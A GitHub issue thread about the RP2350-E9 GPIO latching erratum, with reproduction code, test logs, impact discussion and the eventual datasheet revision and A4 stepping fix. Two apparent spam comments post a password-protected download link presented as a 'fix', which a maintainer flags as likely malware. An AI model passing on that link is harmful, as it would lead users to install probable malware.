raspberrypi/pico-feedback #401: RP2350-E9 Erratum: can get "stuck" at 2V state even without pulldown

dhalbert, 2024-08-26:
I'm debugging a CircuitPython issue in which we see input pins stuck at slightly above 2V, even without all the conditions described in the RP2350-E9 erratum. I reproduced the problem in MicroPython as well.
https://github.com/adafruit/circuitpython/issues/9541
https://github.com/orgs/micropython/discussions/15621#discussioncomment-10446747

The basic conditions are:
- A pin is set up for GPIO input, with no internal pulls enabled.
- The pin initially reads low.
- If the pin is jumpered high temporarily, and then the jumper is removed, the pin remains stuck at some voltage above 2V, as measured with a voltmeter.
- Then connecting the pin to ground with a 1M resistor and waiting for any charge to dissipate does not help. The pin remains stuck at the same voltage and reads as high.
- Jumpering the pin directly to ground clears the "stuck" state and the pin reads low.
- The process can be repeated.

For example, in CircuitPython:
```
Adafruit CircuitPython 9.2.0-alpha.2351-3-g16b6c8877e-dirty on 2024-08-25; Pimoroni Tiny 2350 with rp2350a
>>> import board, digitalio
>>> gp0 = digitalio.DigitalInOut(board.GP0)
>>> gp0.pull = None       # pullups should already be disabled, but make sure
>>> gp0.value  # initial state - pin unconnected
False
>>> gp0.value  # connect to 3.3V with a 1M resistor
True
>>> gp0.value  # Remove resistor: pin reads 2.3V on voltmember
True
>>> gp0.value  # connect via same resistor to ground: pin still reads 2.3V even after many seconds: no bleed-off
True
>>> gp0.value  # Connect directly to ground with a jumper
False
>>> gp0.value  # Remove jumper
False
```
I can reproduce the same kind of behavior in MicroPython.

I am at a loss to explain this. It seems like a more general problem than RP2350-E9. I've added some extra code to call `gpio_disable_pulls()` even before calling `gpio_init()` on the pin, to make sure we are not getting into the E9 state. Am I misunderstanding something about how to deal with pin setup?

The next step would be to reproduce this in pico-sdk, and I'll try that tomorrow.

seeronline, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

WSA1k, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

jepler, 2024-08-26:
[github seeronline reported. Please don't use that link above, it's likely some kind of malicious software]

dhalbert, 2024-08-26:
Here is a very simple pico-sdk reproducer.
Tested with pico-sdk 2.0.0.
`arm-none-eabi-gcc` is `13.2.rel1`.
```sh
cmake -DPICO_BOARD=pimoroni_tiny2350 ..
```

**CMakeFiles.txt**
```
cmake_minimum_required(VERSION 3.13...3.27)

# initialize the SDK based on PICO_SDK_PATH
# note: this must happen before project()
include(pico_sdk_import.cmake)

project(my_project)

# initialize the Raspberry Pi Pico SDK
pico_sdk_init()

add_executable(e9
        e9.c
        )

# pull in common dependencies
target_link_libraries(e9 pico_stdlib)

pico_enable_stdio_usb(e9 1)
pico_enable_stdio_uart(e9 0)

# create map/bin/hex file etc.
pico_add_extra_outputs(e9)
```
**e9.c**
```c
#include <stdio.h>
#include "pico/stdlib.h"
#include "hardware/gpio.h"

#define PIN 0

int main() {
    stdio_init_all();
    sleep_ms(2000);

    gpio_disable_pulls(PIN);
    gpio_init(PIN);
    gpio_disable_pulls(PIN);  // make sure no pulls

    // More reliable reproduction with high drive strength.
    gpio_set_drive_strength(PIN, GPIO_DRIVE_STRENGTH_12MA);

    int count = 0;
    while (true) {
        printf("%d: pin is %d\n", count, gpio_get(PIN));
        sleep_ms(1000);
        count++;
    }
}
```

**Output:**
```
[pin is unconnected; voltmeter on pin reads 0v]
1: pin is 0
2: pin is 0
...
9: pin is 0
10: pin is 0
[1M resistor jumpered between pin and 3.3V]
11: pin is 1
12: pin is 1
13: pin is 1
14: pin is 1
[1M resistor removed; voltmeter reads 2.3V]
15: pin is 1
16: pin is 1
17: pin is 1
18: pin is 1
[1M resistor jumpered between pin and ground; voltmeter reading still 2.3V and does not change over many seconds]
19: pin is 1
20: pin is 1
21: pin is 1
22: pin is 1
23: pin is 1
...
[wire jumpered between pin and ground, so pin pulled to ground hard; voltmeter goes to 0v]
59: pin is 0
60: pin is 0
61: pin is 0
62: pin is 0
[wire jumper removed]
63: pin is 0
64: pin is 0
```

waiweng83, 2024-08-27:
@dhalbert from our testing, an external pull-down resistor lower than  ~9K ohm is needed to make it low again.

DangerousPrototypes, 2024-08-27:
Can confirm. I want to do a bit more digging, but the pull-down does not seem to be required for latch up. 

[image]

The latest Bus Pirate firmware has a ```bug``` command that can reproduce the E9 bug without the pull-down every being active.

9K external pull-down probably isn't a solution for us.

DangerousPrototypes, 2024-08-28:
I extended my bug replicating command to try four tests:
```
DIO> bug e9
Replicate bug E9

Test 1:
Pull-down disabled...
Disabling Bus Pirate pull-ups
Making IO0 buffer and GPIO input
Making IO0 buffer an output
GPIO pin should be 0: 0
Making IO0 buffer and GPIO input
Enabling Bus Pirate pull-ups
Making IO0 buffer an output
Disabling Bus Pirate pull-ups
GPIO pin should be 0: 1
GPIO is 1, E9 found
```
gpio_disable_pulls is run before testing for E9. E9 is cleared, and then found **without pull-downs**.

```
Test 2:
Set pulls disabled...
Disabling Bus Pirate pull-ups
Making IO0 buffer and GPIO input
Making IO0 buffer an output
GPIO pin should be 0: 0
Making IO0 buffer and GPIO input
Enabling Bus Pirate pull-ups
Making IO0 buffer an output
Disabling Bus Pirate pull-ups
GPIO pin should be 0: 1
GPIO is 1, E9 found
```
gpio_set_pulls(bio2bufiopin[BIO0], false, false); is run. E9 is cleared and then **detected without pull-down**.

```
Test 3:
Disabling Bus Pirate pull-ups
Making IO0 buffer and GPIO input
Making IO0 buffer an output
GPIO pin should be 0: 0
Making IO0 buffer and GPIO input
Enabling Bus Pirate pull-ups
Making IO0 buffer an output
Disabling Bus Pirate pull-ups
GPIO pin should be 0: 1
GPIO is 1, E9 found
GPIO.IE = false...
GPIO pin should be 0: 0
```
Replicate E9, then disable GPIO.IE. When GPIO.IE is disabled, E9 is no longer detected.

```
Test 4:
Strong low test...
Disabling Bus Pirate pull-ups
Making IO0 buffer and GPIO input
Making IO0 buffer an output
GPIO pin should be 0: 0
Making IO0 buffer and GPIO input
Making IO0 buffer an output
Disabling Bus Pirate pull-ups
GPIO pin should be 0: 0
```
Hold pin strong low, DO NOT expose to a high level voltage (eg don't latch up), then let float. E9 does not occur if the pin is not exposed to a high level voltage (obviously, but just to demonstrate).

[Source code for the bug command](https://github.com/DangerousPrototypes/BusPirate5-firmware/blob/main/commands/global/bug.c).

DangerousPrototypes, 2024-08-29:
[image]

Went to visit Matt Mets at Blinkinlabs. He soldered 4.7K 0201 resistors on top of our existing 100K pull-down array. This appears to be enough (at least for this chip) to counteract the latch up.

```
DIO> bug e9
Replicate bug E9

Test 1:
Pull-down disabled...
Disabling Bus Pirate pull-ups
Making IO0 buffer and GPIO input
Making IO0 buffer an output
GPIO pin should be 0: 0
Making IO0 buffer and GPIO input
Enabling Bus Pirate pull-ups
Making IO0 buffer an output
Disabling Bus Pirate pull-ups
GPIO pin should be 0: 0

Test 2:
Set pulls disabled...
Disabling Bus Pirate pull-ups
Making IO0 buffer and GPIO input
Making IO0 buffer an output
GPIO pin should be 0: 0
Making IO0 buffer and GPIO input
Enabling Bus Pirate pull-ups
Making IO0 buffer an output
Disabling Bus Pirate pull-ups
GPIO pin should be 0: 0
```

calumapplepie, 2024-08-30:
I don't think this is a true issue; if a pin has no pull-down, it is in a high impedance state.  The reading from it should really be considered undefined.  It is likely another view of the same problem as in RP2350-E9; its just that the erratum doesn't mention it, because reading high-impedance inputs is poorly defined anyways.

The software fix is to keep the IE register disabled, and perform the IE on -> read pin -> IE off dance for every read, if high-impedance inputs or internal pull-downs might be involved.

todbot, 2024-08-30:
> I don't think this is a true issue
Respectfully disagree. High-impedance inputs are common in multi-drop networks, capacitive touch sensing, and low-power button inputs. I currently have several Pico-based projects that cannot use Pico2/RP2350 because of this problem.

gemarcano, 2024-08-30:
@todbot beat me to it, I also think this is a valid issue, especially given that at least some (if not all?) the tests in this report include external pull-down resistors and still exhibit the bug. From the first comment, they reproduced the issue while the pin was connected to a 1 Mohm resistor to ground. Others have stated that an external resistors no larger than ~8kohm is needed to make sure the pin is actually pulled down once a high level is removed.

Personally, if this bug (extension to E9?) is confirmed, it's somewhat alarming because most people around me use 10kohm resistors as standard jelly-bean pull-up and pull-down resistors, and it sounds like an external 10kOhm pull-down wouldn't be able to pull down the input pin's level to ground. I guess it's something that can be "fixed" with very loud documentation stating to use external sub 7kohm resistors?

barawn, 2024-08-30:
to add on to @gemarcano and @todbot , if the pin is reading 2.15V, that means that the Pico is _driving current_ (possibly sinking, too? did anyone try a 1M pullup to 3.3V?) onto the line in that state, when it's an input. That is 100% an issue - it's not just about what the Pico's reading, it's also about what it's doing to the rest of the circuit. ~0.2 mA isn't always a trivial amount of current.

JamesH65, 2024-08-30:
We know this is an issue, after all, we published an errata about it. We are still investigating, but so far the errata is complete and accurate - we will rephrase some of it to clarify things, and provide more detail asap.

DangerousPrototypes, 2024-08-30:
>I don't think this is a true issue

It's a huge issue for us, and we have halted production of rp2350 boards.

>so far the errata is complete and accurate - we will rephrase some of it to clarify things, and provide more detail asap

It's accurate in that the small subset of "when pull-down is enabled it latches up" is true. But it is not complete in the much more expansive scope of "any pin will less than ~8K pull-down acts as a bus keep". 

I sent Bus Pirates to Raspberry Pi, you can load the most recent firmware and run the ```bug e9``` command to see a repeatable demonstration of the bug.

NNNILabs, 2024-08-30:
> I don't think this is a true issue

I'd like to add another data point to prove how it might be a problem in certain use cases, if I may.

[image]

I'm using PIO to communicate with an MCP3201 ADC via SPI. The ADC does not set the data out pin till the second clock cycle in the transaction, leaving it floating between conversions. Because of the latching issue, PIO interprets the ~2V as two leading 1s in the conversion, which would not happen normally.

Here's another image of the same ADC being read by the RP2040:

[image]

Of course, the simple workaround in my case was to simply mask the result using 0xFFF, but other use cases might not have an obvious (and feasible) software or hardware solution.

kevinjwalters, 2024-08-30:
The Pi Pico 2 (like other Pico boards) has `GPIO24` sensing `VBUS` using a 5k/10k resistor pair. Will this issue have any effect on that?

![Pi Pico 2 VBUS sensing with GPIO24(https://github.com/user-attachments/assets/3c97d8ef-8ba1-4300-aad5-ff28a3b5f478)

robert-rozee, 2024-08-31:
> to add on to @gemarcano and @todbot , if the pin is reading 2.15V, that means that the Pico is _driving current_ (possibly sinking, too? did anyone try a 1M pullup to 3.3V?) onto the line in that [...]

has ANYONE checked if there is any change in current consumption of the RP2350 device when a pin enters this 'latch-up' state? while the pin itself may only be able to source 200uA before unlatching, whatever mechanism is holding the pin at 2.1v may well be consuming far more - or not. this is something rather important to confirm either way.

and what happens if ALL 48 of the GPIO pins on a RP2350B (80-pin) device end up in the 'latch-up' state? does the 10mA of unlatching current flow through a single internal node? and again, what is the effect of ALL GPIO pins sitting in 'latch-up' on the devices current consumption?

cheers,
rob   :-)

todbot, 2024-09-04:
Until more is known, I recommend the "Getting Started with Micropython" site & book linked from https://datasheets.raspberrypi.com/pico/getting-started-with-pico.pdf have a note that certain sections do not work with Pico2.

Specifically, https://projects.raspberrypi.org/en/projects/getting-started-with-the-pico/6
and pages 53-67 of https://hackspace.raspberrypi.com/books/micropython-pico
[image]

mordae, 2024-09-04:
This looks relevant: https://community.element14.com/products/raspberry-pi/f/forum/55046/rp2350-gpio-pull-down-latching-bug/223658

Driving an input pin with a sine wave (input impedance of 10kΩ) results in the following behavior (measured at pin):
[image]

As they correctly mention, pin leakage current is obviously wrong and the pins configured as inputs are obviously not always high-impedance. This is probably a deal-breaker for many high-impedance time-to-digital sensing applications.

xoblite, 2024-09-04:
[https://github.com/raspberrypi/pico-feedback/issues/409](url) ...thoughts?

dhalbert, 2024-09-06:
The RP2350 datasheet has been updated and the RP2350-E9 erratum has been extensively revised: https://datasheets.raspberrypi.com/rp2350/rp2350-datasheet.pdf#page=1342 (printed page number is 1341). The erratum title is now "Increased leakage current on Bank 0 GPIO when pad input is enabled".

dhalbert, 2024-09-07:
- I have opened https://github.com/raspberrypi/pico-sdk/issues/1914 to ask about pico-sdk support.

lurch, 2024-11-19:
This has now been thoroughly documented in RP2350-E9 in https://datasheets.raspberrypi.com/rp2350/rp2350-datasheet.pdf and this issue seems to have gone quiet, so I guess this can be closed now?

closed 2024-11-19 by lurch

mordae, 2025-01-15:
@lurch @Wren6991: Can we get some information on whether new stepping will address this issue and perhaps a rough timeline (this year, next year, later), now that it has been confirmed? Pretty please.

xplshn, 2025-04-09:
> [@lurch](https://github.com/lurch) [@Wren6991](https://github.com/Wren6991): Can we get some information on whether new stepping will address this issue and perhaps a rough timeline (this year, next year, later), now that it has been confirmed? Pretty please.

I would also like to know if a new revision of the board has a hardware fix for this issue, specially, I would like to know how to identify such boards or in the opposite case, how to manually fix this myself.

(I own a Pico 2 W)

lurch, 2025-05-06:
> how to manually fix this myself

See the RP2350-E9 erratum in https://datasheets.raspberrypi.com/rp2350/rp2350-datasheet.pdf

pike2k, 2025-08-03:
There will soon be a 'A4 stepping' version that fixes E9 :) https://www.cnx-software.com/2025/07/29/raspberry-pi-rp2350-a4-stepping-fixes-e9-gpio-erratum-9-glitching-bugs-introduces-2mb-flash-variants/

lurch, 2025-08-04:
Not just "soon", https://www.raspberrypi.com/news/rp2350-a4-rp2354-and-a-new-hacking-challenge/ says "immediate availability" 🙂